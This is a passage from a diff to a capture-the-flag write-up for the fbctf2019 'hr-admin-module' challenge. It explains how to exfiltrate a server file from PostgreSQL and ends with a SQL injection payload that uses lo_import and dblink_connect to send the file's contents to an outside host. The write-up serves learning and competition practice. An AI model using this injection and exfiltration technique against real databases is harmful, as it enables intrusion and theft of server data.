PDKT-Team/ctf/fbctf2019/hr-admin-module/README.md

     0x0050:  6772 6573 0000                           gres.
 ```

-Seems like it only has one empty table in the current schema and the flag is not in database.
-By the hint on the website, we may need to exfiltrate the data from `/var/lib/postgresql/data/secret`.
-If we try to use `pg_read_file` or `pg_read_binary_file` to read the file, we will not get any incoming connection so the current user may not have permission to use those functions.
+It looks like it only has one empty table in the current schema and the flag is not in the database.
+We may really need to exfiltrate data from `/var/lib/postgresql/data/secret`.
+Unfortunately, if we try to use `pg_read_file` or `pg_read_binary_file` to read the file, we will not get an incoming connection so that the current user may not have permission to use these functions.

-Other alternative to read the file is using large objects (https://www.postgresql.org/docs/11/lo-funcs.html).
-We can use `lo_import` to load a file content to `pg_largeobject` catalog.
+The alternative to reading files is to use large objects (https://www.postgresql.org/docs/11/lo-funcs.html).
+We can use `lo_import` to load the contents of the file into the `pg_largeobject` catalog.
 If the query is success, we will get the object's `oid`.

 ```
 asd' UNION SELECT 1,(SELECT dblink_connect('host=IP user=' || (SELECT lo_import('/var/lib/postgresql/data/secret')) || ' password=postgres dbname=postgres')) --